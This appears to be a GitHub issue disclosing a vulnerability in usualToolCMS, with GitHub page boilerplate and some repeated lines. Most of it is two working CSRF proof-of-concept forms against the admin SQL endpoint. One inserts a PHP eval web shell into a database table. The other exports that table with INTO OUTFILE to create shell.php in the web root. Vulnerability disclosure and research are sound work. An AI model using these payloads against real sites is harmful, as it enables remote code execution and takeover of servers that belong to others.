Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
If you want to use the vulnerability, you need to have the MySQL operation rights
First, generating CSRF POC and inserting a line of data containing PHP malicious codes into CMS_water
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/usualToolCMS/cmsadmin/a_sqlbackx.php?t=sql" method="POST"> <input type="hidden" name="sqlcontent" value="INSERT INTO `cms_water`(`id`, `water`, `water_type`, `water_place`, `water_textcolor`, `water_textsize`, `water_text`, `water_png`) VALUES (2,2,'image',7,'#B5B5BB5',20,'<?php eval($_POST[c]); ?>','')" /> <input type="hidden" name="submit" value="执行SQL语句" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Finally, exporting the PHP malicious code into the root directory of the website to generate shell.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/usualToolCMS/cmsadmin/a_sqlbackx.php?t=sql" method="POST"> <input type="hidden" name="sqlcontent" value="SELECT `id`, `water`, `water_type`, `water_place`, `water_textcolor`, `water_textsize`, `water_text`, `water_png` FROM `cms_water` WHERE 1 INTO OUTFILE '../../WWW/usualToolCMS/shell.php'" /> <input type="hidden" name="submit" value="执行SQL语句" /> <input type="submit" value="Submit request" /> </form> </body> </html>
shell:http://127.0.0.1/usualToolCMS/shell.php
The text was updated successfully, but these errors were encountered:
No branches or pull requests
If you want to use the vulnerability, you need to have the MySQL operation rights
First, generating CSRF POC and inserting a line of data containing PHP malicious codes into CMS_water
Finally, exporting the PHP malicious code into the root directory of the website to generate shell.
shell:http://127.0.0.1/usualToolCMS/shell.php
The text was updated successfully, but these errors were encountered: